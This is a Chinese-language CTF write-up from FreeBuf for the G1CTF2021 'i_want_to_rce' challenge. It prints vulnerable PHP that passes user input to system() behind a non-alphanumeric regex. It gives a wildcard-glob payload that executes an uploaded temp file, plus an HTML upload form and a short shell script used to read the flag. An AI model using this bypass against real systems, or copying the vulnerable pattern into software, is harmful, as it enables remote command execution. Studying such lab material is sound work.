官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
G1CTF2021 | 题目解析之i_want_to_rce
- 关注
G1CTF2021 | 题目解析之i_want_to_rce
访问网址显示内容如下:
分析
代码如下:
<?php
error_reporting(0);
if(!isset($_GET['code'])){ #code参数highlight_file(__FILE__);
}else{
$code = $_GET['code'];
if(preg_match("/[A-Za-z0-9_$]+/",$code)){ #绕过正则die('fighting!');
}
system($code); #输出flag}
主要考查PHP代码审计和绕过规则该题和津门杯hate_php很类似
不同的地方就是函数eval(),system()
eval类型函数是代码执行 system类型函数是命令执行 不需要闭合
绕过原理:
payload:?code=.%20/???/????????[@-[]
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html
该题的PHP版本是5.6
解题步骤
1.打开本地服务器phpStudy
2.在根目录下一般是 \phpStudy\WWW 创建一个 .txt文件
写一个文件上传php代码 然后改成 .html文件
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://10.1.5.252:2333/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
上传一个 .txt文件写上
#!/bin/bash ls
3.抓返回包
然后cat,得到flag
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
- 0 文章数
- 0 关注者
文章目录